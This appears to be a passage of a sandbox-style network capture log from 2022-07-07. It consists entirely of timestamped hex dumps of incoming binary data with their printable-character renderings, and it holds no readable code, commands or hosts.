                                                                                                                                                            2022-07-07 07:51:12 UTC3334INData Raw: ee ab 2e 8b 9d f8 97 87 70 7a bc 21 3e 53 bd 90 cd d2 06 e8 5f 8f 48 8d a7 a4 62 5a f9 be c7 a4 4c 6e 6e 9d 62 0e 70 bf 7f 72 75 fe 2c 9f 75 dc 98 09 cc c6 af 5d 29 b6 93 4f ef 45 26 d7 26 ea e8 aa be 96 9b 12 b1 33 44 4e 00 e0 a4 69 e1 1f 7a c5 db ad f7 c5 b4 fc 82 8b bb 85 8a 36 60 15 19 76 c3 f0 6e cf 7b ec e4 1f b8 e2 47 03 0d 84 97 60 83 97 29 d9 b2 ab 7d 10 66 6d 7c 9f ca b0 e5 fb cb 08 f4 dc e8 a0 72 30 80 c8 e5 72 c0 36 d6 59 4c 56 c2 c5 35 3e e0 b0 a0 1f 2d 9b f5 e7 2b f9 b6 9b 9e 46 34 5e 65 7e af 5f 78 a9 83 97 1e 16 14 5f 21 ca 21 06 5e b9 3d 34 9c 3d 2a 29 35 1f e0 54 6b 53 04 d7 ef 96 93 99 61 44 94 a6 dd 0d e4 9b 4f ea 65 67 b7 ea 8d 9c 54 5b e3 89 8a ab 15 d2 89 10 5c 0b 24 e7 fa c3 ce 60 14 2e 0c 70 83 15 86 0b 36 c1 d8 78 04 01 d5 04 e4
                                                                                                                                                            Data Ascii: .pz!>S_HbZLnnbpru,u])OE&&3DNiz6`vn{G`)}fm|r0r6YLV5>-+F4^e~_x_!!^=4=*)5TkSaDOegT[\$`.p6x
                                                                                                                                                            2022-07-07 07:51:12 UTC3350INData Raw: d9 87 30 47 3f 8f 86 4a d2 f6 73 95 d0 46 4a 12 6c d5 7e 23 7e f0 49 03 0d da 97 19 c8 42 96 d1 d3 10 af 49 2b 26 15 14 e5 94 10 5d c8 84 a9 51 7c 1c d4 4c 1c fb 2f a9 3b 48 1f 5a 82 58 6d a5 20 95 44 e0 f4 99 46 f8 ef 1b f1 7b 2f 78 bd 4f 5c 48 dd 22 af 66 b8 c1 6f 63 c0 41 bd fc 63 1a 39 15 7f e6 cd 79 c9 92 2f 6d 4a f1 17 3a 56 e0 ae 14 5d 89 bc fa 9f 32 31 de 94 d2 17 f7 93 74 1b 21 c3 af 11 2e d5 57 90 7d 8f 6f 92 9f 1a 87 98 bc f1 44 60 4c c9 9c 4c 06 19 eb 16 eb 5a c3 20 6d f1 36 d6 8b d0 62 82 32 63 85 91 d9 c0 b6 e1 d7 ee 8e bb cf 7b 78 63 91 47 21 a1 8f 9b 0c 48 bc 40 89 c1 34 8f 85 b0 b2 17 c9 ed bb 96 14 4b 13 14 e1 b9 38 0e 70 fa b6 11 f6 7d 11 7a af f7 98 51 af 9d 48 6c c9 8b 1d 9f a7 c8 29 fa 5e 9f f3 58 fb 44 f0 aa 2e 9c 90 3c 00 05 a4 aa
                                                                                                                                                            Data Ascii: 0G?JsFJl~#~IBI+&]Q|L/;HZXm DF{/xO\H"focAc9y/mJ:V]21t!.W}oD`LLZ m6b2c{xcG!H@4K8p}zQHl)^XD.<
                                                                                                                                                            2022-07-07 07:51:12 UTC3366INData Raw: 4d ed 9d 05 ca af 93 3f e4 ad 90 f4 72 84 81 95 7f 99 67 9f d5 8b 3e 68 3e ca 2d 65 af 8f 33 2f ce 84 25 f4 1b e5 cb 3f 81 3b ba f3 f9 59 88 32 dc 6c e7 fe cd 35 95 69 68 72 e2 f3 ee 2e c6 7c 46 f3 91 3a 24 d1 72 7c 51 0d a2 7e be ec b8 d1 f2 78 08 d5 4e 46 68 99 32 fa ff 0d e9 0b 2b 76 ac 34 e1 31 1e 12 b8 c6 a4 e0 85 db 8f a5 6f 4f 4d f1 76 a4 e5 24 b2 7c 87 9d 1e 64 b1 83 c1 04 b2 1f 09 70 28 b0 a2 92 32 1c fa c2 1d 86 72 59 02 ef 57 78 32 f0 bc a0 5b 14 fc 41 8f fe 39 44 af 25 a1 02 b1 a0 6b 2d 5e 4e 27 9d d1 7d e9 1b 8c 03 de 2c 8e d1 8c e0 ed af f5 25 ba bb c9 8f ef 44 1d a0 a4 0c a7 8d 5f 3a 40 b6 83 4a 62 ce 90 40 53 1a aa 12 22 4c 50 65 bf fd b3 52 ef ba d7 79 32 c1 69 e4 9b 65 a4 1e f7 4a f6 58 3a 76 99 12 5f 8f c3 05 45 c2 83 b8 a4 7a a9 6a df
                                                                                                                                                            Data Ascii: M?rg>h>-e3/%?;Y2l5ihr.|F:$r|Q~xNFh2+v41oOMv$|dp(2rYWx2[A9D%k-^N'},%D_:@Jb@S"LPeRy2ieJX:v_Ezj
                                                                                                                                                            2022-07-07 07:51:12 UTC3382INData Raw: 16 0f 63 cb 6d 8d 84 05 e0 24 15 8a 1c 57 20 bf 29 ec c4 6f 04 e4 96 0f c3 22 a2 22 27 ee d5 9c 5b 3d dc 8b 7e 30 2f ad fe 44 36 26 11 a2 56 19 67 33 8b 35 1b 5e e2 19 66 d1 56 1d b5 30 db 85 cd 9c ca 64 ca 9e c6 01 36 33 9b 9d a8 23 2f 9d ca 74 09 4d 46 b9 de 07 ce f2 08 37 5e 2d 6f 3c 80 c3 c0 5b d3 0e 20 d4 bb 63 ce e1 01 35 7f d8 39 3c 0e 0a ec ad 38 96 f2 54 83 62 88 f6 6e 41 6e 6b ac 25 6e ee 5a 59 f0 0f bc 90 0f e8 e3 8e 78 2c 9c 7f 14 7a 08 27 5e ae 84 9a fc d3 e2 a6 cc 25 83 d7 42 a3 b9 b6 de 42 92 c4 c2 a7 a9 bf fc 01 30 0c 61 5a bc 35 4a 14 44 fc 0d a0 b3 98 86 f9 ba ba c7 4c 32 c0 e5 d5 87 c8 58 b6 ea 0f 90 20 c4 f5 be dc 90 7a 47 7a b4 9f 05 74 98 cd d7 52 57 ca 13 79 3d 1e ec eb 83 34 79 67 64 b5 50 ca fb e4 67 e4 83 df ac 01 97 a2 1b e4 04
                                                                                                                                                            Data Ascii: cm$W )o""'[=~0/D6&Vg35^fV0d63#/tMF7^-o<[ c59<8TbnAnk%nZYx,z'^%BB0aZ5JDL2X zGztRWy=4ygdPg
                                                                                                                                                            2022-07-07 07:51:12 UTC3398INData Raw: 21 2d e1 91 6a df 02 31 8f 6a 39 34 39 11 85 b4 2a 54 7f e1 6a 0b d9 69 99 da fe a4 bc 1a d4 2d 22 d6 60 15 d4 99 07 a1 d5 c2 c2 53 16 78 c0 08 52 2c 14 5d 74 c3 d1 61 38 be 8f c0 6c aa e6 4f a3 0d e0 d9 57 94 73 55 a6 53 19 a4 42 6c 54 fe f4 70 2f 5d f9 49 9e 26 2c ed 6f e8 e3 4a a3 a6 fb 21 e7 32 32 60 52 7e 79 4b 50 ee 2a 49 c5 95 80 3b 52 1e 8d ea 24 5b 68 f9 62 05 77 db 6e 5f 80 7c 6d 6f 5f 04 35 e8 cc d1 15 d7 e7 42 23 02 22 36 78 a4 99 72 b6 bc f8 40 92 a3 a1 27 70 43 b6 15 37 4a da 9d df 8f 62 97 e9 79 3f d0 a2 c6 5e 12 f5 f6 07 bf a1 2f 12 0b 3a 0f 13 49 83 8e 1d 88 c3 4d b6 85 c2 28 49 ba 4e b2 01 2f a8 f3 bb 94 23 56 09 dc 01 5d 07 a4 a7 54 48 b3 ca 18 ea 24 a4 76 78 a8 1d 9d 2c 9b 8d 9c 7b 5d 5d 9e f3 d3 c3 4e 35 d8 fb 9f 6b 79 cf 1d 06 e9 88
                                                                                                                                                            Data Ascii: !-j1j949*Tji-"`SxR,]ta8lOWsUSBlTp/]I&,oJ!22`R~yKP*I;R$[hbwn_|mo_5B#"6xr@'pC7Jby?^/:IM(IN/#V]TH$vx,{]]N5ky
                                                                                                                                                            2022-07-07 07:51:12 UTC3414INData Raw: a4 0e 92 a8 32 eb ea 42 3b e9 c7 e4 2e d1 5a 8a 1d 87 cb 51 1c e3 6a 50 f2 06 3d b7 66 b0 de 10 90 99 21 d3 0b 7f aa d3 81 9b 7e dd e7 ca 5a f7 8b 57 12 ee 3e ef f2 20 36 15 17 92 60 e7 82 1b 57 ab 41 9b 93 15 5d 75 a4 b1 68 bf 17 2e fe 53 34 bc 7d 92 fa 38 80 df 30 b9 1a 61 a9 f1 e2 02 a2 81 47 34 3d 2b b3 b2 1b 78 f5 71 6f e8 af 7c e8 ef dd b1 f4 03 42 40 24 77 8c c2 48 03 db da 4c ef 7e 6e 01 11 b0 3e c4 38 cb 3f 5a 73 5f d4 4f 47 b7 28 15 6d 54 2f c7 a3 87 e8 cd c0 d5 1b 10 fd 19 73 f2 8c 3c ef c3 e4 2a d4 c8 3b 9c ee 37 b2 fa da 72 9b 7b b2 da 63 46 af 8d 7b 85 81 90 69 3e f3 84 61 59 b7 58 37 c0 0f ac e9 a7 5f c7 2c c7 3f 69 a2 72 70 4c 0b eb ef 90 3e ce d5 6c 39 3d ad c2 de 18 87 39 51 a8 a3 93 7d dd 3a 1c c8 58 b4 61 72 98 dc 35 40 a2 20 4f ad 98
                                                                                                                                                            Data Ascii: 2B;.ZQjP=f!~ZW> 6`WA]uh.S4}80aG4=+xqo|B@$wHL~n>8?Zs_OG(mT/s<*;7r{cF{i>aYX7_,?irpL>l9=9Q}:Xar5@ O
                                                                                                                                                            2022-07-07 07:51:12 UTC3430INData Raw: 75 b5 b3 9c 45 9c 33 07 e7 99 ea 2c 22 77 d5 9b f0 fd 6b e5 c8 4e cc 37 54 b6 79 e8 75 8b 92 4a 27 60 7e a8 20 19 44 41 4c 4b 87 21 11 da 47 1b 83 a4 39 28 8f 61 86 8e 16 bc 64 7d 43 6c 0f d5 72 09 2c 57 12 f9 c4 55 98 e6 58 4f 44 1e 90 5c 6e 50 21 07 0d 34 50 15 eb c8 fd 96 b4 0d 01 f3 aa 3c 36 e0 d5 87 40 5e 14 25 84 93 a6 e3 e8 5b 9c ee 8c 29 f6 45 6f 2c 2b 00 7c 61 a0 58 d9 fe 1e 11 05 d5 37 6d 63 fc 47 c7 f7 93 c1 96 2b f5 a4 98 d1 68 71 e0 2b 33 f6 12 fb 49 4b 4d a9 2e 1d ef d6 3c 51 41 4b 4a 15 2c 97 c6 ca 7c 8c a8 e3 8a 75 57 4d ba e4 b6 b7 f0 3c 66 34 24 a0 bd 13 fb c3 a7 2d 72 9f 5e 24 28 ea 17 70 8d 7a 3b 4a be a5 fe c1 7c 9a 03 a2 d0 77 99 47 6f 87 00 a3 80 92 c1 f3 11 d4 5a 65 49 9e 8a 38 ae 38 e4 aa e6 ab 4d fd a1 14 d2 db e0 a5 a9 04 e3 85
                                                                                                                                                            Data Ascii: uE3,"wkN7TyuJ'`~ DALK!G9(ad}Clr,WUXOD\nP!4P<6@^%[)Eo,+|aX7mcG+hq+3IKM.<QAKJ,|uWM<f4$-r^$(pz;J|wGoZeI88M
                                                                                                                                                            2022-07-07 07:51:12 UTC3446INData Raw: 08 56 f4 72 42 9b 43 78 ea 23 2b 90 7b 90 f9 d2 b9 c2 80 dd e1 c3 e7 03 ec a1 5a bc ae d4 57 b3 e5 77 f1 08 7a 92 7d 85 81 14 0c a1 e5 e3 e2 f5 a0 2b d8 f9 cc fa 6e 9f fc 90 63 bd c6 e3 d0 8b 42 41 d5 20 40 eb a7 16 2c 5b 48 9d c9 36 a1 3e e1 cf 98 40 a0 b7 90 22 d5 98 d4 00 85 bc 68 de 47 c5 dd 4b b8 8a 2a fe fc 33 f7 0c 6b 2c 52 02 26 f4 39 de 9c d2 19 6d 6e 6f 15 47 88 c9 5e 57 1e b1 24 18 9a 96 51 4c 5c a0 4f 45 a3 6e 27 48 92 92 de 98 26 22 ef 2b 9c be e6 bd a6 de 9d c2 f6 34 13 59 3b 61 88 ad c3 cb 20 7f 7e d2 e0 88 5b ea 4b 7a e4 98 07 78 b9 a8 9a a7 f5 71 00 17 d4 33 0f e1 9e 26 1b 26 db a7 f4 72 70 6e 6f 31 2f e6 fd 94 61 ad 45 05 8f 17 82 b2 fa 17 dd 71 0a 3b 96 8e 48 7d f8 3b 19 a7 50 88 91 46 a0 e0 86 c1 07 14 7c d4 ca e2 67 86 bd 74 72 ea 45
                                                                                                                                                            Data Ascii: VrBCx#+{ZWwz}+ncBA @,[H6>@"hGK*3k,R&9mnoG^W$QL\OEn'H&"+4Y;a ~[Kzxq3&&rpno1/aEq;H};PF|gtrE
                                                                                                                                                            2022-07-07 07:51:12 UTC3462INData Raw: 87 40 4d 14 52 1b f7 fc 80 17 d0 4a 27 37 98 59 92 fa dd 8e 4b ea 7c 1d 06 be f5 5c a7 c2 9c 00 37 7e f1 a1 bc d4 ac 81 a3 5d c8 3a c4 f4 c4 15 35 ad f4 01 41 41 bb 1c 6b 9b 2e 40 28 c3 0a 05 1b a7 b3 56 12 27 d8 5f d4 b6 a2 d9 1f 14 ad 3d 42 8d fb 63 46 37 bf b6 e4 2b 94 5c ef 9f c8 40 12 94 76 5d 0e 06 e5 11 2e 9f 6b ff 98 d7 53 1a 7f de 0f 8e ae 03 25 2c bb a1 17 a6 fa c3 04 c3 20 8f 1b 40 2f bd c0 ae 26 1f ca 7c 7d fe 18 7b f1 45 b0 0d 71 14 8b 69 98 41 ec da 3e cd ce 53 6a ea d3 bd 68 bf 69 09 5c 46 ef 3f 6b d1 f7 01 39 94 5d 8b 26 6a 5b b1 2e 29 cc 7a 7c 77 08 7a 5f 1a 7c 28 44 b6 91 30 fe 3b 21 13 14 47 89 15 16 46 f1 89 1b 87 ce 36 a9 cb e6 cc e2 2b 82 8c dc c7 89 94 69 da 3c 1b e3 bc f7 e3 e6 84 3f b6 9f 74 28 f8 6f 38 36 03 6b 93 b5 96 c7 ee 6a
                                                                                                                                                            Data Ascii: @MRJ'7YK|\7~]:5AAk.@(V'_=BcF7+\@v].kS%, @/&|}{EqiA>Sjhi\F?k9]&j[.)z|wz_|(D0;!GF6+i<?t(o86kj
                                                                                                                                                            2022-07-07 07:51:12 UTC3478INData Raw: 63 a0 99 85 4f b8 37 1e 96 89 6f 6e 00 6b 6d 07 f4 07 87 75 44 92 64 ba 1c 52 90 de 76 d6 c2 a3 e3 3a 42 92 fe c3 1d 3d 8b 31 49 5d d5 04 8a 43 ac b9 e1 93 48 d3 8e 89 d7 74 0c be 0f 4d cf b2 7e ca 46 19 8e db 55 43 38 7a 87 98 8c 48 e4 c7 3a 34 8b 4f 7c d3 83 6d 45 68 c3 57 b0 0c 00 a1 27 8b 64 58 d6 b9 4c 41 54 6f ff 91 a3 ed 89 0c 83 f1 9b 77 b5 fa 27 b7 52 07 ba 52 b8 0f a3 6b ad c6 0e 1a 51 09 c8 54 ac a2 77 72 a4 4b a1 e3 7f 01 8c 30 b3 31 3e ad 90 6a 7a 30 b2 15 e2 cc d6 2f 53 88 c1 b2 54 1b 3f 13 74 ac 6f 3a 43 c8 2a 34 de 0a 62 94 6c 06 22 35 b3 6b 5d da 34 62 03 15 23 b2 b1 86 cc 7d 9c fd 89 1c 59 37 60 3e 78 63 fb ed bb 59 80 86 0f 49 c4 ee cd 23 8c 4e 82 06 85 cf 52 fa eb 29 ab 62 76 c2 88 ce 18 9a 77 99 81 0d f6 59 2f 16 94 11 24 7a 08 00 f9
                                                                                                                                                            Data Ascii: cO7onkmuDdRv:B=1I]CHtM~FUC8zH:4O|mEhW'dXLATow'RRkQTwrK01>jz0/ST?to:C*4bl"5k]4b#}Y7`>xcYI#NR)bvwY/$z
                                                                                                                                                            2022-07-07 07:51:12 UTC3494INData Raw: 40 8f 2a bf 72 45 38 28 1a 48 3a 97 16 1c fe 92 0c 8a 95 8d d9 98 1a 8c c1 c1 f1 5b 0e 8f 32 04 86 19 25 19 35 3b c0 29 20 4a e2 1d fd a0 83 02 73 82 d7 1d 81 e5 bf b9 3e 77 4a 2f ee f6 b6 1c 26 dd 68 8d 0d e0 de 10 22 a0 52 a2 8d 46 6a d8 81 51 7c bf b6 a6 34 a7 4d cc 36 96 90 b1 a8 b1 43 0a e0 e8 51 7b b4 a9 3e 3f 5c 44 a0 64 11 ba 25 f8 98 47 01 82 b8 36 58 74 5e b0 d8 8b 06 be 16 4f b7 9d 0f c3 28 c0 79 dc a6 3b c1 d4 f8 01 68 a3 2c 4e b2 01 87 08 26 d2 be 2f fa 42 6d 51 72 8f 8a 9f 5f f7 df 15 7f 75 42 f9 2a cc 23 3f 5e 1a aa 68 b0 79 36 29 0c fe 73 81 65 fd 36 38 eb 3e 7c 75 f8 2e a1 47 5c 78 4f b3 e5 51 9e 50 4a 2b 90 f4 e3 57 13 a8 17 25 f5 2e 1a ed 8c 56 33 c8 46 a3 f1 23 52 57 6e bc 67 36 d4 e3 65 36 61 c6 d4 d6 45 ef 80 06 80 69 10 a3 0a 7d 42
                                                                                                                                                            Data Ascii: @*rE8(H:[2%5;) Js>wJ/&h"RFjQ|4M6CQ{>?\Dd%G6Xt^O(y;h,N&/BmQr_uB*#?^hy6)se68>|u.G\xOQPJ+W%.V3F#RWng6e6aEi}B
                                                                                                                                                            2022-07-07 07:51:12 UTC3510INData Raw: 11 4a a9 eb a8 55 11 c0 ea 50 86 5c 18 78 fd c3 68 88 86 0b e6 5b 9e af 69 21 cc 89 1a 24 7c 79 70 21 a3 5a fc cc e6 33 82 6b 65 ba 31 18 19 fd 21 2d 9b 3d dc 0e b5 a6 b6 22 7c cb 35 24 ff 5f a2 93 37 18 5d 41 30 26 22 cd 09 93 54 b0 c4 3f 80 9d 9f 2c b8 fd af 09 9c 4c f0 ae e8 5f 5b 3b ed 38 a2 32 9f 5e 0d 3d 46 6c 05 98 0e c5 5e 04 ed 09 62 eb 17 6e 92 4f 43 0a 6f 30 30 c9 82 bf c2 6c 4c 9b a3 84 1d 94 58 ab 7f 78 20 bb e6 1c 97 3a d3 6b a7 bb b9 8a fb cb 68 09 17 97 47 e3 5d 46 c6 1b d6 d6 d3 3d 88 a3 e1 0f bb 32 76 76 58 b9 4b 43 ea 61 2d 38 26 8f ee a9 82 79 0f cb b7 0a ea ff 34 4f 43 87 44 bb 22 e2 19 e8 fc f7 95 ab a7 16 4d 91 fb 5b 88 f1 37 55 a3 3b 7b 3e c7 27 6e 17 39 6c cc 53 a8 64 f2 c2 60 d5 f3 b8 cb eb 18 0f ac 5e 81 4d d2 2d b0 43 75 ef c6
                                                                                                                                                            Data Ascii: JUP\xh[i!$|yp!Z3ke1!-="|5$_7]A0&"T?,L_[;82^=Fl^bnOCo00lLXx :khG]F=2vvXKCa-8&y4OCD"M[7U;{>'n9lSd`^M-Cu
                                                                                                                                                            2022-07-07 07:51:12 UTC3526INData Raw: c2 78 37 4d c5 6d eb b4 04 5e fb d8 1d b8 db c5 2a c3 63 d0 ee 9b 64 41 5d 98 de 66 cb dd 75 b0 a9 49 5a 6f 30 99 f7 6d 57 2a 1b 88 01 79 81 af 47 a0 c5 e8 73 9b 28 27 79 28 48 0f 25 1b b8 ed 9a 5a 48 0c a7 ac e3 4b ed 33 15 53 98 54 85 de db 8f bb 25 fe 4e b2 00 83 e4 70 3c 18 2e ab 1f e0 da e7 20 e0 a7 5e 14 21 cb 01 ef 81 0a 69 b7 a1 34 61 2e ed 03 3f b5 df 05 53 1f f0 a0 4b a9 57 27 06 91 e8 03 f0 a2 37 9e a9 4d 5e 61 3f 34 0c c2 af 3b 06 bb 6e d8 95 01 ac 2c 31 47 86 05 5f ce 87 bb f7 0e e2 72 57 49 c5 ae 45 a5 e5 9e 7f 5d a7 e5 7b 9b 41 22 7a 64 31 c0 7f b9 3b 61 c1 1b d2 cb 01 6b 46 57 1b d7 91 df e3 a5 dd 8f 9b f7 ac d2 7d 7a a0 6b 34 29 3f 9d 8c fa a7 ba 20 ae 25 83 16 de 05 c9 11 52 79 3f 16 d5 74 99 b2 c8 f6 4e cb bf f8 e5 c7 31 dd 10 32 f9 5e
                                                                                                                                                            Data Ascii: x7Mm^*cdA]fuIZo0mW*yGs('y(H%ZHK3ST%Np<. ^!i4a.?SKW'7M^a?4;n,1G_rWIE]{A"zd1;akFW}zk4)? %Ry?tN12^
                                                                                                                                                            2022-07-07 07:51:12 UTC3542INData Raw: af 10 42 0f 41 1a 0e fc 2c 98 e2 56 7c 1d 2b 2a 39 09 3f 81 55 39 4a a4 2a d4 6d e6 9f 0f 3b 49 00 f1 fe 21 75 86 10 29 93 2a b9 ba 13 f1 b7 86 11 81 08 e5 ee aa 10 9a 84 b6 79 a9 d8 89 c5 6f 1f bc 1f ad 3f 97 48 bc ba 2f ce a1 54 0a 81 98 80 3b 27 52 60 73 c3 46 86 18 8c 08 b0 e1 3b 92 93 33 39 d5 08 81 ed cb 61 16 74 6e c5 21 f9 93 c9 fd c4 10 a1 83 92 52 2c 5e 5f 49 aa 74 3a 6f e8 9f 56 48 50 5e 34 4a f0 cf 68 ca b3 4f ab 86 9f c0 a3 f4 ad 90 5c af 3d 99 ed 8f b2 3a 2d b6 27 1d ea d8 78 87 02 fc f1 3d a1 9f d8 58 15 bc 87 18 83 b1 3b a3 7e 0b be c6 fa 61 f7 19 77 06 a3 bd f9 23 47 aa 3a ce 44 15 ad 96 25 16 91 eb c0 9f a5 a1 ae e2 07 0d 19 f8 c2 37 8d 22 7b 2f 15 a8 b2 4a 38 a7 af 55 96 62 49 06 79 46 01 3d 84 c9 ee c4 30 37 5e 37 a7 d9 b9 74 94 1e 26
                                                                                                                                                            Data Ascii: BA,V|+*9?U9J*m;I!u)*yo?H/T;'R`sF;39atn!R,^_It:oVHP^4JhO\=:-'x=X;~aw#G:D%7"{/J8UbIyF=07^7t&
                                                                                                                                                            2022-07-07 07:51:12 UTC3558INData Raw: da 45 8c 3c 18 d6 81 31 50 05 1e 1c 41 e2 95 1e 9f 96 74 f9 be 89 f3 25 c7 e1 19 df 6e 7e 7d 84 6f 4c 6f 01 80 61 be da 9d 48 41 20 47 ff 72 0f 4e 97 6a 75 5b 33 27 2a 84 9e 47 7f ff 48 f3 ad ae fd 9e f4 08 0b 15 f7 a6 fd f2 ed b6 b5 7d 15 03 1c fb 15 b7 c6 06 74 ca 9c bf b3 34 c2 0f 60 f8 70 50 bc 2e 34 25 35 0a af 7f d8 30 14 9e 45 fa 90 7a d8 b9 ce dc 8e 19 6a e6 f1 37 0e f7 6a 32 1f 75 70 44 ff 7d 72 ae 90 82 74 1d 4a 75 59 60 3d fe 14 38 cf b3 e8 d2 2d 97 75 7f b2 e6 98 6c 42 10 a3 8b 46 3c 01 43 01 98 2d e2 48 9d ee f2 bb 00 06 8f ae 0e 3c 6f 63 a0 e0 84 6c 51 78 ad 2b 38 80 7c 7e 7c 66 e5 7f 45 be dd 2f f8 d2 9f ad e3 67 09 f0 95 cd 82 2d 9a 62 1b 74 5d 99 08 65 87 c7 d6 6f 04 15 5c 41 62 ec 43 b3 b5 67 96 a7 46 16 a0 bf 78 88 e0 c3 db a4 9d 8f 75
                                                                                                                                                            Data Ascii: E<1PAt%n~}oLoaHA GrNju[3'*GH}t4`pP.4%50Ezj7j2upD}rtJuY`=8-ulBF<C-H<oclQx+8|~|fE/g-bt]eo\AbCgFxu
                                                                                                                                                            2022-07-07 07:51:12 UTC3574INData Raw: 12 f9 cf 4d 38 4e 33 9e 4a fd 14 59 76 72 27 f3 62 14 e8 ce 18 23 93 44 04 52 0b 5c 67 38 77 a0 99 57 a7 a7 63 07 32 8d 06 21 10 53 6d a8 6c 2d b9 19 2c fd 6d ad 97 96 6e c7 0c 3f 76 c1 ab 2f 2e 2b 71 ce 36 23 d2 3d 08 9f c2 c6 a3 90 a2 b0 32 e6 f6 a0 57 c9 f8 20 df 68 ea 48 33 a2 5b d9 55 38 9c 31 17 e9 73 dc 4e 2f 89 7f 7a 43 18 29 f7 82 02 0b ee 6c 44 66 a8 0c 12 bf 32 35 ba e8 17 3c 47 c2 2c ab 44 86 f8 1a 14 44 26 2a 98 a0 ac 8a 8c 10 b3 4c a6 f2 7a ad 62 ab da 78 96 63 f1 b0 26 a0 a7 58 25 dc ae 45 08 9a 4d d2 80 3a 61 e2 f4 99 98 a9 35 dc c6 62 1c a7 7f 62 cd 8e 3d dd da 7e e2 55 ea 5c 7b ea 13 32 e5 b2 04 65 3c b3 b1 da b6 8b e8 4e 2b fc d8 4f 9c a5 a1 66 e4 84 60 f8 9d 67 70 e0 4f 6b 00 bc bc 3d df 6b 6a 54 dc 9f 71 8d dc 7c d4 00 52 82 cd 50 ec
                                                                                                                                                            Data Ascii: M8N3JYvr'b#DR\g8wWc2!Sml-,mn?v/.+q6#=2W hH3[U81sN/zC)lDf25<G,DD&*Lzbxc&X%EM:a5bb=~U\{2e<N+Of`gpOk=kjTq|RP
                                                                                                                                                            2022-07-07 07:51:12 UTC3590INData Raw: 19 4c ef 1e 97 d8 69 10 d1 bc 70 61 42 23 6d 14 08 ee 6f a8 9a c1 c5 53 e7 80 10 b6 3d bc 56 9c cc f3 69 1d 11 aa fe eb db af 1c 41 fd dd 5b 01 a0 ed 88 ec aa bf d5 65 f7 eb ce 83 e0 e2 27 ca ee 6f c2 81 af e8 45 30 bd 3f 85 a0 4a a3 dd 4a 58 43 14 61 13 30 4b 9f f6 4c f0 9c 71 02 a2 57 86 32 1c 65 39 e3 e3 31 1f b1 d6 10 58 be c0 b7 d9 20 1d 63 40 35 ec 0b 48 e0 ff 58 42 59 a1 f9 59 94 ae d8 c8 f7 4b f5 40 cd bf 7c 12 5e b0 cf b9 02 8a 02 5f 09 4d 13 15 e7 ac a9 9c db a1 77 f0 f0 02 72 d0 f6 f5 cf 29 12 04 c9 01 11 61 e9 f8 b9 6e be 25 af d4 eb 3a a4 c2 74 aa a8 46 9e 58 9a e4 fe f6 88 5b 1c d2 bb 97 4b 1e 78 f0 83 26 a8 14 14 fe 72 56 28 37 b8 f1 6b 3a 4e 3c f9 92 6c 23 37 dd b3 1b 55 a8 4f ee 03 d4 43 f4 5e 59 45 83 68 3a 28 25 2c e7 d4 b0 e0 33 4b 09
                                                                                                                                                            Data Ascii: LipaB#moS=ViA[e'oE0?JJXCa0KLqW2e91X c@5HXBYYK@|^_Mwr)an%:tFX[Kx&rV(7k:N<l#7UOC^YEh:(%,3K
                                                                                                                                                            2022-07-07 07:51:12 UTC3606INData Raw: 8a e3 5a 1a d4 a9 ae ec 7d b4 e9 1c 15 27 3b c6 d3 b6 b1 a7 5a d5 cc 7b 53 f5 aa 69 f9 35 06 e7 5e ce c3 e9 40 56 d9 52 d3 86 91 9a c1 6d ca 19 60 1d d5 9c 08 15 d9 74 5e af be 58 20 7d b5 7e bb 6b 66 27 29 f4 05 f1 af 22 ee ba 77 ea 4b a2 84 47 d5 cb b3 f4 ca 28 c7 a3 0e a0 2c b7 1e f1 2b 57 1e bd ee 07 c5 aa 96 06 3c 4b 75 69 19 80 f5 ea ba dc 66 a7 bb ed e1 dc 23 0d 5f 9c 09 32 74 5c b3 25 96 3b 1a 11 ca c5 ad 9b fc 3e 50 b0 93 2e fa 1c 23 45 cd 6b 73 fb e2 ce b9 08 70 37 ab e5 40 35 6c b3 bc 7c 9d dc 58 32 37 0c 89 e5 d4 bd 62 a7 f0 ab 0f af 58 3c cb 9b 10 51 9d 30 4a 9f c5 2f 19 d5 72 74 4a f7 93 07 3f c3 b7 37 05 d7 7c 32 bd 7c 52 c6 e8 68 50 d8 39 25 99 77 95 1a 34 be 0f 34 ce c6 06 da fe a8 27 4a b0 bc cd d2 f2 f6 c0 83 dc d0 08 36 78 06 b4 05 03
                                                                                                                                                            Data Ascii: Z}';Z{Si5^@VRm`t^X }~kf')"wKG(,+W<Kuif#_2t\%;>P.#Eksp7@5l|X27bX<Q0J/rtJ?7|2|RhP9%w44'J6x
                                                                                                                                                            2022-07-07 07:51:12 UTC3622INData Raw: 41 2f 3a 1f 21 21 b3 5f 62 1f a6 b2 b1 7b 3a a1 5c 8f 7f 5b 35 ed 96 45 95 cf ff 34 82 66 1c c6 00 d4 b8 2e 66 da 40 78 d7 7e aa 9c 14 0e db 42 db 9f 65 d1 f8 a3 02 6a ea 22 23 37 01 7d 2b 83 51 0c 2e 4c 4e e4 14 82 71 aa 3e df 46 91 de aa d5 9f ba 57 4d 22 95 bf a3 64 85 1f 9e b8 76 f9 80 ed 7a 27 ee 0b ae 2c 36 8b f1 5a ca f5 5a a3 e9 ac 28 2e a1 dd 08 ef 8c d7 39 97 fc 00 80 08 76 ca 59 6a b9 29 a3 23 0d 5d 69 10 c4 a9 a5 e6 e3 df 45 d1 ec f9 c8 16 e0 7c eb c5 e1 ec 69 f8 48 5c 01 64 a6 02 6c 3d be cf c5 4b c7 b7 c3 42 80 2a c7 ee b1 3f 66 e0 16 c5 9c 9d 3b 83 d1 1f 62 ea 24 b1 bd 40 67 68 8a 18 32 92 76 89 43 bc 23 38 a8 b6 13 85 f8 34 9f 87 26 cd 04 8a e7 7e 55 fd 55 4d 3c f5 43 14 50 e1 9e 6a 5b 1a 26 4f a6 87 cc a4 f3 91 56 c5 42 9f 27 54 eb df 45
                                                                                                                                                            Data Ascii: A/:!!_b{:\[5E4f.f@x~Bej"#7}+Q.LNq>FWM"dvz',6ZZ(.9vYj)#]iE|iH\dl=KB*?f;b$@gh2vC#84&~UUM<CPj[&OVB'TE
